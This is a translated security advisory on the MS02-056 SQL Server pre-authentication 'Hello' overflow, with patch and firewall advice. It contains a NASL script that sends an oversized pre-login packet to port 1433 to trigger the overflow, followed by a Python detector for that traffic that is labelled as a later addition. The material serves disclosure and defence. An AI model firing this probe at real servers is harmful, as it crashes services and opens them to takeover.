Security Vulnerability
Microsoft SQL Server Pre-Authentication Remote Buffer Overflow Vulnerability (MS02-056)

Published: 2002-08-06
Updated: 2002-10-09

Affected systems:
Microsoft SQL Server 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Description:
BUGTRAQ  ID: 5411
CVE(CAN) ID: CVE-2002-1123

Microsoft SQL Server is a large-scale database system developed by Microsoft.

Microsoft SQL Server contains a flaw in its pre-authentication processing that a remote attacker can use to trigger a buffer overflow.

The pre-authentication procedure in Microsoft SQL Server is flawed: a remote attacker who connects to TCP port 1433 can trigger a buffer overflow. Because the problem occurs before authentication takes place, no credentials are needed to exploit it, and the attacker may be able to execute arbitrary instructions on the system with the privileges of the SQL Server process.


<*Source: Dave Aitel (dave@immunitysec.com)
  
  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
         http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
         http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
*>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear all risk themselves!

Dave Aitel (daitel@atstake.com) provided the following NASL test script:

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);

script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        #uncomment this to see what normally happens
        #attack_string="MSSQLServer";
        #uncomment next line to actually test for overflow
        attack_string=crap(560);
        # this creates a variable called sql_packet
        sql_packet = pkt_hdr+attack_string+pkt_tail;
        send(socket:soc, data:sql_packet);

        r  = recv(socket:soc, length:4096);
        close(soc);
        display ("Result:",r,"\n");
        if(!r)
        {
            display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}
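A defender-side check for this traffic, added here as an example and not part of the original advisory or of the script above: it parses a captured client pre-login packet bound for TCP 1433 and flags the two inconsistencies the probe above exhibits, a header length that does not match the bytes on the wire and an instance-name option that is not NUL-terminated within its declared size. The TDS header layout and the pre-login option format are assumed from the protocol as understood here; the sample packets are constructed from the script's own header and tail bytes.

```python
import struct

TDS_PRELOGIN = 0x12      # TDS packet type of a client pre-login message
OPT_INSTOPT = 0x02       # pre-login option that carries the instance name
OPT_TERMINATOR = 0xFF    # marks the end of the option table

# Header and tail bytes reproduced from the NASL script above (pkt_hdr / pkt_tail).
PKT_HDR = bytes.fromhex(
    "1201003400000000" "000015000601001b"
    "000102001c000c03" "00280004ff080002"
    "10000000"
)
PKT_TAIL = bytes.fromhex("0024010000")

# Constructed samples: the normal request naming the default instance, and the
# probe the script sends (560 filler bytes where the instance name belongs).
BENIGN_PACKET = PKT_HDR + b"MSSQLServer" + PKT_TAIL
PROBE_PACKET = PKT_HDR + b"A" * 560 + PKT_TAIL


def inspect_prelogin(packet: bytes) -> list[str]:
    """Return findings for one client-to-server TDS packet; empty means it looks sane.

    Assumed layout: 8-byte header (type, status, big-endian length, SPID,
    packet id, window), then a table of 5-byte options (token, offset, length)
    ending in 0xFF, with offsets relative to the start of the payload.
    """
    findings = []
    if len(packet) < 8:
        return ["truncated TDS header"]
    ptype, _status, declared_len = struct.unpack(">BBH", packet[:4])
    if ptype != TDS_PRELOGIN:
        return findings  # other packet types are out of scope for this check
    if declared_len != len(packet):
        findings.append(f"header declares {declared_len} bytes but packet carries {len(packet)}")
    payload = packet[8:]
    pos = 0
    while pos < len(payload) and payload[pos] != OPT_TERMINATOR:
        if pos + 5 > len(payload):
            return findings + ["truncated option table"]
        token, off, length = struct.unpack(">BHH", payload[pos:pos + 5])
        if off + length > len(payload):
            findings.append(f"option 0x{token:02x} points past the end of the packet")
        elif token == OPT_INSTOPT and b"\x00" not in payload[off:off + length]:
            findings.append(f"instance name not NUL-terminated within its declared {length} bytes")
        pos += 5
    return findings
```

The benign packet is exactly the 52 bytes its header declares, so it produces no findings, while the probe yields both a length mismatch and an unterminated instance name.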

Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Block untrusted IP addresses from reaching the SQL Server service port, at the firewall or on the server itself

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS02-056) and the corresponding patch for this issue:
MS02-056: Cumulative Patch for SQL Server (Q316333)
Link: http://www.microsoft.com/technet/security/bulletin/MS02-056.asp

Patch download:

     * Microsoft SQL Server 7.0:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tech
     * Microsoft SQL Server 2000:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333&sd=tech

This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.